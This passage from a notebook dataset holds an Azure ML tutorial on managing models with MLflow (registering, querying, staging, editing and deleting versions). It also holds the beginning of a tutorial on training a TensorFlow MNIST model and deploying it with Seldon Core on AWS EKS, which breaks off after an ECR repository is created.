https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom (11 KB at 266.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom (363 B at 10.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom (3 KB at 66.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom (14 KB at 317.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom (815 B at 20.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom (5 KB at 92.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom\n"
],
[
"!kubectl create -f h2o_deployment.json",
"seldondeployment.machinelearning.seldon.io/seldon-deployment-example created\r\n"
]
],
[
[
"Wait until ready (replicas == replicasAvailable)",
"_____no_output_____"
]
],
[
[
"!kubectl rollout status deployment/h2o-deployment-h2o-predictor-1cc70ed",
"deployment \"h2o-deployment-h2o-predictor-1cc70ed\" successfully rolled out\r\n"
],
[
"!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \\\n seldon-deployment-example --namespace seldon -p",
"----------------------------------------\nSENDING NEW REQUEST:\n\n[[66.008 '1' '1' '0' 7.051]]\nRECEIVED RESPONSE:\nmeta {\n puid: \"d36r5qsei3dd62tkrt6g9i75h5\"\n requestPath {\n key: \"prostate-classifier\"\n value: \"h2o-test:0.1\"\n }\n}\ndata {\n ndarray {\n values {\n list_value {\n values {\n number_value: 0.42621511584615\n }\n values {\n number_value: 0.57378488415385\n }\n }\n }\n }\n}\n\n\n"
],
[
"!minikube delete",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb50b4dbb8e754a04f375378e332d1835de78c74 | 16,001 | ipynb | Jupyter Notebook | notebooks/using-mlflow/model-management/model_management.ipynb | jplummer01/azureml-examples | 6a073d157f21060312941f71cfbcf25d0c541183 | [
"MIT"
] | null | null | null | notebooks/using-mlflow/model-management/model_management.ipynb | jplummer01/azureml-examples | 6a073d157f21060312941f71cfbcf25d0c541183 | [
"MIT"
] | null | null | null | notebooks/using-mlflow/model-management/model_management.ipynb | jplummer01/azureml-examples | 6a073d157f21060312941f71cfbcf25d0c541183 | [
"MIT"
] | null | null | null | 27.212585 | 364 | 0.594275 | [
[
[
"# Model management with MLflow\n\nModel management can be done using both MLflow and Azure ML SDK/CLI v2. If you are familiar with MLflow and the capabilities it exposes, we support the entire model lifecycle using the MLFlow client. If you rather use Azure ML specific features or do model management using the CLI, in the same way you can manage the lifecycle using the Azure ML CLI/SDK v2.",
"_____no_output_____"
],
[
"## Support matrix for managing models\n\nThe MLflow client exposes several methods to retrieve and manage models. The following table shows which of those methods are currently supported in MLflow when connected to Azure ML:\n\n| Feature | MLflow | Azure ML with MLflow | Azure ML CLIv2 |\n| :- | :-: | :-: | :-: |\n| Registering models in MLModel models | ☑️ | ☑️ | ☑️ |\n| Registering models not in MLModel format | ☐ | ☐ | ☑️ |\n| Registering models from runs with URIs as `runs/:<ruin-id>/<path>` | ☑️ | ☑️ | ☐ |\n| Registering models from runs with URIs as `azureml://jobs/<job-id>/outputs/artifacts/<path>` | ☐ | ☐ | ☑️* |\n| Listing registered models | ☑️ | ☑️ | ☑️ |\n| Retrieving details of registered model's versions | ☑️ | ☑️ | ☑️ |\n| Editing registered model's versions description | ☑️ | ☑️ | ☑️ |\n| Editing registered model's versions tags | ☑️ | ☑️ | ☑️ |\n| Renaming registered models | ☑️ | ☐** | ☐** |\n| Deleting a registered model (container) | ☑️ | ☐** | ☐** |\n| Deleting a registered model's version | ☑️ | ☑️ | ☑️ |\n| Search registered models by name | ☑️ | ☑️ | ☑️ |\n| Search registered models using string comparators `LIKE` and `ILIKE` | ☑️ | ☐ | ☐ |\n| Search registered models by tag | ☐ | ☐ | ☐ |\n\nNotes:\n* (*) With compatibility issues with Mlflow client\n* (**) Registered models are immutable objects in Azure ML",
"_____no_output_____"
],
[
"## Prerequisites to run this notebook",
"_____no_output_____"
]
],
[
[
"# Ensure you have the dependencies for this notebook\n%pip install -r logging_model_with_mlflow.txt",
"_____no_output_____"
],
[
"import mlflow",
"_____no_output_____"
]
],
[
[
"In the following notebook, we will explore an example that uses the following naming convention:",
"_____no_output_____"
]
],
[
[
"experiment_name = \"heart-classifier\"\nmodel_name = \"heart-classifier\"\nartifact_path = \"classifier\"",
"_____no_output_____"
]
],
[
[
"We need to create a couple of runs and experiments in the workspace to work with. Please run at least one or two training routines:",
"_____no_output_____"
]
],
[
[
"# Install the AML extension and log into Azure\n!az extension add -n ml\n!az login",
"_____no_output_____"
],
[
"# Configure workspace and resource group\n!az config set defaults.workspace=MyWorkspace defaults.group=MyResourceGroup",
"_____no_output_____"
],
[
"# Ensure there is a compute to train on\n!az ml compute create -f ../jobs/trainer-cpu.compute.yml",
"_____no_output_____"
],
[
"# Submit a couple of training jobs to have something to work with\n!az ml job create -f ../jobs/heart-classifier.job.yml",
"_____no_output_____"
]
],
[
[
"## Before starting\n\nIf you are running inside of a Compute Instance in Azure ML, MLflow is already configured to be used. If you are running in you local machine or in a different platform, please configure MLflow to point to the workspace you want to work with by uncommenting the following line and placing your workspace tracking URL.",
"_____no_output_____"
]
],
[
[
"# mlflow.set_tracking_uri = \"<TRACKING_URI>\"",
"_____no_output_____"
]
],
[
[
"> To get the URI, please navigate to Azure ML Studio and select the workspace you are working on > Click on the name of the workspace at the upper right corner of the page > Click “View all properties in Azure Portal” on the pane popup > Copy the MLflow tracking URI value from the properties section.",
"_____no_output_____"
],
[
"## Creating models from an existing run\n\nIf you have an Mlflow model logged inside of a run and you want to register it in a registry, you can do that by using the experiment and run ID information from the run:",
"_____no_output_____"
]
],
[
[
"exp = mlflow.get_experiment_by_name(experiment_name)\nlast_run = mlflow.search_runs(exp.experiment_id, output_format=\"list\")[-1]\nprint(last_run.info.run_id)",
"_____no_output_____"
]
],
[
[
"Once we have the run identified, we can register the model using Mlflow client:",
"_____no_output_____"
]
],
[
[
"mlflow.register_model(f\"runs:/{last_run.info.run_id}/{artifact_path}\", model_name)",
"_____no_output_____"
]
],
[
[
"## Creating models from assets\n\nIf you have a folder with an MLModel MLflow model, then you can register it directly. There is no need for the model to be always in the context of a run. To do that you can use the URI schema `file://path/to/model` to register it. Let's create a simple model and save it in MLModel format:",
"_____no_output_____"
]
],
[
[
"from sklearn import linear_model\n\nreg = linear_model.LinearRegression()\nreg.fit([[0, 0], [1, 1], [2, 2]], [0, 1, 2])\n\nmlflow.sklearn.save_model(reg, \"./regressor\")",
"_____no_output_____"
]
],
[
[
"Check the files in the folder",
"_____no_output_____"
]
],
[
[
"!ls regressor",
"_____no_output_____"
]
],
[
[
"You can now register the model from the local path:",
"_____no_output_____"
]
],
[
[
"import os\n\nmodel_local_path = os.path.abspath(\"./regressor\")",
"_____no_output_____"
],
[
"mlflow.register_model(f\"file://{model_local_path}\", \"local-model-test\")",
"_____no_output_____"
]
],
[
[
"> Notice how the model URI schema `file:/` requires absolute paths.",
"_____no_output_____"
],
[
"## Querying models",
"_____no_output_____"
],
[
"### Querying all the models in the registry",
"_____no_output_____"
],
[
"You can query all the registered models in the registry using the MLflow client with the method `list_registered_models`.",
"_____no_output_____"
]
],
[
[
"client = mlflow.tracking.MlflowClient()",
"_____no_output_____"
],
[
"for model in client.list_registered_models():\n print(f\"{model.name}\")",
"_____no_output_____"
]
],
[
[
"If you are not sure of the name of the model you are looking for, you can search for it:",
"_____no_output_____"
]
],
[
[
"client.search_registered_models(f\"name='{model_name}'\")",
"_____no_output_____"
]
],
[
[
"### Getting specific versions of the model",
"_____no_output_____"
],
[
"The command above will retrieve the model object which contains all the model versions. However, if you want to get the last registered model version of a given model, you can use `get_registered_model`:",
"_____no_output_____"
]
],
[
[
"client.get_registered_model(model_name)",
"_____no_output_____"
]
],
[
[
"If you need an specific version of the model, you can indicate so:",
"_____no_output_____"
]
],
[
[
"client.get_model_version(model_name, version=2)",
"_____no_output_____"
]
],
[
[
"## Model stages\n\nMLflow supports model's stages to manage model's lifecycle. Stage are assigned to model's version (instead of models). This means that a given model can have multiple versions on different stages.",
"_____no_output_____"
],
[
"### Queying model stages\n\nYou can use the MLflow client to check all the possible stages a model can be:",
"_____no_output_____"
]
],
[
[
"client.get_model_version_stages(model_name, version=\"latest\")",
"_____no_output_____"
]
],
[
[
"You can see what model version is on each stage by getting the model from the registry:",
"_____no_output_____"
]
],
[
[
"client.get_latest_versions(model_name, stages=[\"Staging\"])",
"_____no_output_____"
]
],
[
[
"Notice that multiple versions can be in the same stage at the same time in Mlflow, however, this method returns the latest version (greater version) among all of them.",
"_____no_output_____"
],
[
"> Caution: Notice that stages are case sensitive.",
"_____no_output_____"
],
[
"### Transitioning models\n\nTo transition a model to a particular stage, you can:",
"_____no_output_____"
]
],
[
[
"client.transition_model_version_stage(model_name, version=3, stage=\"Staging\")",
"_____no_output_____"
]
],
[
[
"By default, if there were an existing model version in that particular stage, it will remain there. Hence, it won't be replaced. Alternatively, you can indicate `archive_existing_versions=True` to tell MLflow to move the existing model's version to the stage `Archived`.",
"_____no_output_____"
]
],
[
[
"client.transition_model_version_stage(\n model_name, version=3, stage=\"Staging\", archive_existing_versions=True\n)",
"_____no_output_____"
]
],
[
[
"### Loading models from stages\n\nYou can load a model in a particular stage directly from Python using the `load_model` function and the following `URI` format. Notice that for this method to success, you need to have all the libraries and dependencies already installed in the environment you are working at.",
"_____no_output_____"
]
],
[
[
"model = mlflow.pyfunc.load_model(f\"models:/{model_name}/Staging\")",
"_____no_output_____"
]
],
[
[
"## Editing and deleting models\n\nEditing registered models is supported in both Mlflow and Azure ML, however, there are some differences between them that are important to notice:",
"_____no_output_____"
],
[
"### Editing models\n\nYou can edit model's description and tags from a model using Mlflow:\n\n> Renaming models is not supported in Azure ML as model objects are immmutable.",
"_____no_output_____"
]
],
[
[
"client.update_model_version(\n model_name, version=1, description=\"A heart condition classifier\"\n)",
"_____no_output_____"
]
],
[
[
"To edit tags, you have to use the method `set_model_version_tag` and `remove_model_version_tag`:",
"_____no_output_____"
]
],
[
[
"client.set_model_version_tag(\n model_name, version=\"1\", key=\"type\", value=\"classification\"\n)",
"_____no_output_____"
]
],
[
[
"Removing a tag:",
"_____no_output_____"
]
],
[
[
"client.delete_model_version_tag(model_name, version=\"1\", key=\"type\")",
"_____no_output_____"
]
],
[
[
"### Deleting a model version\n\nYou can delete any model version in the registry using the MLflow client. However, Azure ML doesn't support deleting the entire model container. To achieve the same thing, you will need to delete all the model versions from a given model.",
"_____no_output_____"
]
],
[
[
"import mlflow",
"_____no_output_____"
],
[
"client.delete_model_version(model_name, version=\"2\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb50b78393efd0fcc90e0f924b757e237e0d0ff5 | 125,443 | ipynb | Jupyter Notebook | examples/models/aws_eks_deep_mnist/aws_eks_deep_mnist.ipynb | pachyderm/seldon-core | 01fc519a7268053b191c745c5ae6bafa0229d5ea | [
"Apache-2.0"
] | 1 | 2021-01-22T02:51:36.000Z | 2021-01-22T02:51:36.000Z | examples/models/aws_eks_deep_mnist/aws_eks_deep_mnist.ipynb | AminuIsrael/seldon-core | 2092ec5471267c3d69697b659376def20c211027 | [
"Apache-2.0"
] | 231 | 2020-08-10T08:38:42.000Z | 2021-08-02T20:56:49.000Z | examples/models/aws_eks_deep_mnist/aws_eks_deep_mnist.ipynb | AminuIsrael/seldon-core | 2092ec5471267c3d69697b659376def20c211027 | [
"Apache-2.0"
] | null | null | null | 35.687909 | 4,684 | 0.435345 | [
[
[
"# AWS Elastic Kubernetes Service (EKS) Deep MNIST\nIn this example we will deploy a tensorflow MNIST model in Amazon Web Services' Elastic Kubernetes Service (EKS).\n\nThis tutorial will break down in the following sections:\n\n1) Train a tensorflow model to predict mnist locally\n\n2) Containerise the tensorflow model with our docker utility\n\n3) Send some data to the docker model to test it\n\n4) Install and configure AWS tools to interact with AWS\n\n5) Use the AWS tools to create and setup EKS cluster with Seldon\n\n6) Push and run docker image through the AWS Container Registry\n\n7) Test our Elastic Kubernetes deployment by sending some data\n\n#### Let's get started! 🚀🔥\n\n## Dependencies:\n\n* Helm v3.0.0+\n* A Kubernetes cluster running v1.13 or above (minkube / docker-for-windows work well if enough RAM)\n* kubectl v1.14+\n* EKS CLI v0.1.32\n* AWS Cli v1.16.163\n* Python 3.6+\n* Python DEV requirements\n",
"_____no_output_____"
],
[
"## 1) Train a tensorflow model to predict mnist locally\nWe will load the mnist images, together with their labels, and then train a tensorflow model to predict the right labels",
"_____no_output_____"
]
],
[
[
"from tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot = True)\nimport tensorflow as tf\n\nif __name__ == '__main__':\n \n x = tf.placeholder(tf.float32, [None,784], name=\"x\")\n\n W = tf.Variable(tf.zeros([784,10]))\n b = tf.Variable(tf.zeros([10]))\n\n y = tf.nn.softmax(tf.matmul(x,W) + b, name=\"y\")\n\n y_ = tf.placeholder(tf.float32, [None, 10])\n\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n init = tf.initialize_all_variables()\n\n sess = tf.Session()\n sess.run(init)\n\n for i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n print(sess.run(accuracy, feed_dict = {x: mnist.test.images, y_:mnist.test.labels}))\n\n saver = tf.train.Saver()\n\n saver.save(sess, \"model/deep_mnist_model\")",
"Extracting MNIST_data/train-images-idx3-ubyte.gz\nExtracting MNIST_data/train-labels-idx1-ubyte.gz\nExtracting MNIST_data/t10k-images-idx3-ubyte.gz\nExtracting MNIST_data/t10k-labels-idx1-ubyte.gz\n0.9194\n"
]
],
[
[
"## 2) Containerise the tensorflow model with our docker utility",
"_____no_output_____"
],
[
"First you need to make sure that you have added the .s2i/environment configuration file in this folder with the following content:",
"_____no_output_____"
]
],
[
[
"!cat .s2i/environment",
"MODEL_NAME=DeepMnist\r\nAPI_TYPE=REST\r\nSERVICE_TYPE=MODEL\r\nPERSISTENCE=0\r\n"
]
],
[
[
"Now we can build a docker image named \"deep-mnist\" with the tag 0.1",
"_____no_output_____"
]
],
[
[
"!s2i build . seldonio/seldon-core-s2i-python36:1.3.0-dev deep-mnist:0.1",
"---> Installing application source...\n---> Installing dependencies ...\nLooking in links: /whl\nRequirement already satisfied: tensorflow>=1.12.0 in /usr/local/lib/python3.6/site-packages (from -r requirements.txt (line 1)) (1.13.1)\nRequirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.0.9)\nRequirement already satisfied: gast>=0.2.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.2.2)\nRequirement already satisfied: absl-py>=0.1.6 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.7.1)\nRequirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.7.1)\nRequirement already satisfied: keras-applications>=1.0.6 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.0.7)\nRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.12.0)\nRequirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.1.0)\nRequirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.19.0)\nRequirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.33.1)\nRequirement already satisfied: tensorboard<1.14.0,>=1.13.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.13.1)\nRequirement already satisfied: numpy>=1.13.3 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.16.2)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (3.7.0)\nRequirement already satisfied: tensorflow-estimator<1.14.0rc0,>=1.13.0 in /usr/local/lib/python3.6/site-packages (from tensorflow>=1.12.0->-r requirements.txt (line 1)) (1.13.0)\nRequirement already satisfied: h5py in /usr/local/lib/python3.6/site-packages (from keras-applications>=1.0.6->tensorflow>=1.12.0->-r requirements.txt (line 1)) (2.9.0)\nRequirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/site-packages (from tensorboard<1.14.0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (3.0.1)\nRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/site-packages (from tensorboard<1.14.0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (0.15.0)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/site-packages (from protobuf>=3.6.1->tensorflow>=1.12.0->-r requirements.txt (line 1)) (40.8.0)\nRequirement already satisfied: mock>=2.0.0 in /usr/local/lib/python3.6/site-packages (from tensorflow-estimator<1.14.0rc0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (2.0.0)\nRequirement already satisfied: pbr>=0.11 in /usr/local/lib/python3.6/site-packages (from mock>=2.0.0->tensorflow-estimator<1.14.0rc0,>=1.13.0->tensorflow>=1.12.0->-r requirements.txt (line 1)) (5.1.3)\nUrl '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nYou are using pip version 19.0.3, however version 19.1.1 is available.\nYou should consider upgrading via the 'pip install --upgrade pip' command.\nBuild completed successfully\n"
]
],
[
[
"## 3) Send some data to the docker model to test it\nWe first run the docker image we just created as a container called \"mnist_predictor\"",
"_____no_output_____"
]
],
[
[
"!docker run --name \"mnist_predictor\" -d --rm -p 5000:5000 deep-mnist:0.1",
"5157ab4f516bd0dea11b159780f31121e9fb41df6394e0d6d631e6e0d572463b\r\n"
]
],
[
[
"Send some random features that conform to the contract",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\n# This is the variable that was initialised at the beginning of the file\ni = [0]\nx = mnist.test.images[i]\ny = mnist.test.labels[i]\nplt.imshow(x.reshape((28, 28)), cmap='gray')\nplt.show()\nprint(\"Expected label: \", np.sum(range(0,10) * y), \". One hot encoding: \", y)",
"_____no_output_____"
],
[
"from seldon_core.seldon_client import SeldonClient\nimport math\nimport numpy as np\n\n# We now test the REST endpoint expecting the same result\nendpoint = \"0.0.0.0:5000\"\nbatch = x\npayload_type = \"ndarray\"\n\nsc = SeldonClient(microservice_endpoint=endpoint)\n\n# We use the microservice, instead of the \"predict\" function\nclient_prediction = sc.microservice(\n data=batch,\n method=\"predict\",\n payload_type=payload_type,\n names=[\"tfidf\"])\n\nfor proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):\n print(f\"LABEL {label}:\\t {proba.number_value*100:6.4f} %\")",
"LABEL 0:\t 0.0068 %\nLABEL 1:\t 0.0000 %\nLABEL 2:\t 0.0085 %\nLABEL 3:\t 0.3409 %\nLABEL 4:\t 0.0002 %\nLABEL 5:\t 0.0020 %\nLABEL 6:\t 0.0000 %\nLABEL 7:\t 99.5371 %\nLABEL 8:\t 0.0026 %\nLABEL 9:\t 0.1019 %\n"
],
[
"!docker rm mnist_predictor --force",
"mnist_predictor\r\n"
]
],
[
[
"## 4) Install and configure AWS tools to interact with AWS",
"_____no_output_____"
],
[
"First we install the awscli",
"_____no_output_____"
]
],
[
[
"!pip install awscli --upgrade --user",
"Collecting awscli\n Using cached https://files.pythonhosted.org/packages/f6/45/259a98719e7c7defc9be4cc00fbfb7ccf699fbd1f74455d8347d0ab0a1df/awscli-1.16.163-py2.py3-none-any.whl\nCollecting colorama<=0.3.9,>=0.2.5 (from awscli)\n Using cached https://files.pythonhosted.org/packages/db/c8/7dcf9dbcb22429512708fe3a547f8b6101c0d02137acbd892505aee57adf/colorama-0.3.9-py2.py3-none-any.whl\nCollecting PyYAML<=3.13,>=3.10 (from awscli)\nCollecting botocore==1.12.153 (from awscli)\n Using cached https://files.pythonhosted.org/packages/ec/3b/029218966ce62ae9824a18730de862ac8fc5a0e8083d07d1379815e7cca1/botocore-1.12.153-py2.py3-none-any.whl\nRequirement already satisfied, skipping upgrade: docutils>=0.10 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from awscli) (0.14)\nCollecting rsa<=3.5.0,>=3.1.2 (from awscli)\n Using cached https://files.pythonhosted.org/packages/e1/ae/baedc9cb175552e95f3395c43055a6a5e125ae4d48a1d7a924baca83e92e/rsa-3.4.2-py2.py3-none-any.whl\nRequirement already satisfied, skipping upgrade: s3transfer<0.3.0,>=0.2.0 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from awscli) (0.2.0)\nRequirement already satisfied, skipping upgrade: urllib3<1.25,>=1.20; python_version >= \"3.4\" in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from botocore==1.12.153->awscli) (1.24.2)\nRequirement already satisfied, skipping upgrade: python-dateutil<3.0.0,>=2.1; python_version >= \"2.7\" in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from botocore==1.12.153->awscli) (2.8.0)\nRequirement already satisfied, skipping upgrade: jmespath<1.0.0,>=0.7.1 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from botocore==1.12.153->awscli) (0.9.4)\nCollecting pyasn1>=0.1.3 (from rsa<=3.5.0,>=3.1.2->awscli)\n Using cached https://files.pythonhosted.org/packages/7b/7c/c9386b82a25115cccf1903441bba3cbadcfae7b678a20167347fa8ded34c/pyasn1-0.4.5-py2.py3-none-any.whl\nRequirement already satisfied, skipping upgrade: six>=1.5 in /home/alejandro/miniconda3/envs/reddit-classification/lib/python3.7/site-packages (from python-dateutil<3.0.0,>=2.1; python_version >= \"2.7\"->botocore==1.12.153->awscli) (1.12.0)\nInstalling collected packages: colorama, PyYAML, botocore, pyasn1, rsa, awscli\nSuccessfully installed PyYAML-3.13 awscli-1.16.163 botocore-1.12.153 colorama-0.3.9 pyasn1-0.4.5 rsa-3.4.2\n"
]
],
[
[
"#### Configure aws so it can talk to your server \n(if you are getting issues, make sure you have the permmissions to create clusters)",
"_____no_output_____"
]
],
[
[
"%%bash \n# You must make sure that the access key and secret are changed\naws configure << END_OF_INPUTS\nYOUR_ACCESS_KEY\nYOUR_ACCESS_SECRET\nus-west-2\njson\nEND_OF_INPUTS",
"AWS Access Key ID [****************SF4A]: AWS Secret Access Key [****************WLHu]: Default region name [eu-west-1]: Default output format [json]: "
]
],
[
[
"#### Install EKCTL\n*IMPORTANT*: These instructions are for linux\nPlease follow the official installation of ekctl at: https://docs.aws.amazon.com/eks/latest/userguide/getting-started-eksctl.html",
"_____no_output_____"
]
],
[
[
"!curl --silent --location \"https://github.com/weaveworks/eksctl/releases/download/latest_release/eksctl_$(uname -s)_amd64.tar.gz\" | tar xz ",
"_____no_output_____"
],
[
"!chmod 755 ./eksctl",
"_____no_output_____"
],
[
"!./eksctl version",
"\u001b[36m[ℹ] version.Info{BuiltAt:\"\", GitCommit:\"\", GitTag:\"0.1.32\"}\r\n\u001b[0m"
]
],
[
[
"## 5) Use the AWS tools to create and setup EKS cluster with Seldon\nIn this example we will create a cluster with 2 nodes, with a minimum of 1 and a max of 3. You can tweak this accordingly.\n\nIf you want to check the status of the deployment you can go to AWS CloudFormation or to the EKS dashboard.\n\nIt will take 10-15 minutes (so feel free to go grab a ☕). \n\n### IMPORTANT: If you get errors in this step...\nIt is most probably IAM role access requirements, which requires you to discuss with your administrator.",
"_____no_output_____"
]
],
[
[
"%%bash\n./eksctl create cluster \\\n--name demo-eks-cluster \\\n--region us-west-2 \\\n--nodes 2 ",
"Process is interrupted.\n"
]
],
[
[
"### Configure local kubectl \nWe want to now configure our local Kubectl so we can actually reach the cluster we've just created",
"_____no_output_____"
]
],
[
[
"!aws eks --region us-west-2 update-kubeconfig --name demo-eks-cluster",
"Updated context arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist in /home/alejandro/.kube/config\r\n"
]
],
[
[
"And we can check if the context has been added to kubectl config (contexts are basically the different k8s cluster connections)\nYou should be able to see the context as \"...aws:eks:eu-west-1:27...\". \nIf it's not activated you can activate that context with kubectlt config set-context <CONTEXT_NAME>",
"_____no_output_____"
]
],
[
[
"!kubectl config get-contexts",
"CURRENT NAME CLUSTER AUTHINFO NAMESPACE\r\n* arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist arn:aws:eks:eu-west-1:271049282727:cluster/deepmnist \r\n docker-desktop docker-desktop docker-desktop \r\n docker-for-desktop docker-desktop docker-desktop \r\n gke_ml-engineer_us-central1-a_security-cluster-1 gke_ml-engineer_us-central1-a_security-cluster-1 gke_ml-engineer_us-central1-a_security-cluster-1 \r\n"
]
],
[
[
"## Setup Seldon Core\n\nUse the setup notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).",
"_____no_output_____"
],
[
"## Push docker image\nIn order for the EKS seldon deployment to access the image we just built, we need to push it to the Elastic Container Registry (ECR).\n\nIf you have any issues please follow the official AWS documentation: https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-basics.html",
"_____no_output_____"
],
[
"### First we create a registry\nYou can run the following command, and then see the result at https://us-west-2.console.aws.amazon.com/ecr/repositories?#",
"_____no_output_____"
]
],
[
[
"!aws ecr create-repository --repository-name seldon-repository --region us-west-2",
"{\r\n \"repository\": {\r\n \"repositoryArn\": \"arn:aws:ecr:us-west-2:271049282727:repository/seldon-repository\",\r\n \"registryId\": \"271049282727\",\r\n \"repositoryName\": \"seldon-repository\",\r\n \"repositoryUri\": \"271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository\",\r\n \"createdAt\": 1558535798.0\r\n }\r\n}\r\n"
]
],
[
[
